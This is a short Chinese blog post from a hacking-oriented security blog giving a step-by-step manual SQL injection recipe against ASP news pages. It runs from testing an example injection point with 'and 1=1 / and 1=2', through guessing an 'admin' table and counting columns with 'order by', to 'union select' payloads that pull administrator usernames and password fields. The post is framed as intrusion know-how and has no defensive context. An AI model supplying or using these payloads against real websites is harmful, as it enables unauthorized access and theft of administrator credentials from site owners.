腳本入侵 手工注入ASP


1.檢測是否存在注入漏洞

錯誤 and 1=1正常 and 1=2 錯誤

注入點:http://www.XXXX.com.cn/newsShow.asp?id=88

2.猜解表段

  猜表段:xor exists (select * from 要猜解的表段的名字)

猜表段:xor exists (select * from admin)

3.猜解字段

   猜字段數:order by 要猜解的字段數  正確返回正常的頁面,猜解錯誤的話返回錯誤的頁面

猜字段數:order by 5  說明有5個字段數 

4..檢測內容 後臺賬號

   xor 1=2 union select 1,2,3,4,5 from 要檢測內容的表段

xor 1=2 union select 1,2,3,4,5 from admin  檢測字段的內容

常見的字段內容username   user  name    admin_name

xor 1=2 union select 1,admin_name,3,4,5 from admin

5. 猜解密碼 後臺密碼

常見的密碼字段 pass  passwd password

xor 1=2 union select 1,admin_name,password,4,5 from admin

 

本文出自 “黑風安全技術聯盟” 博客,請務必保留此出處http://heifeng.blog.51cto.com/2580498/927287

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章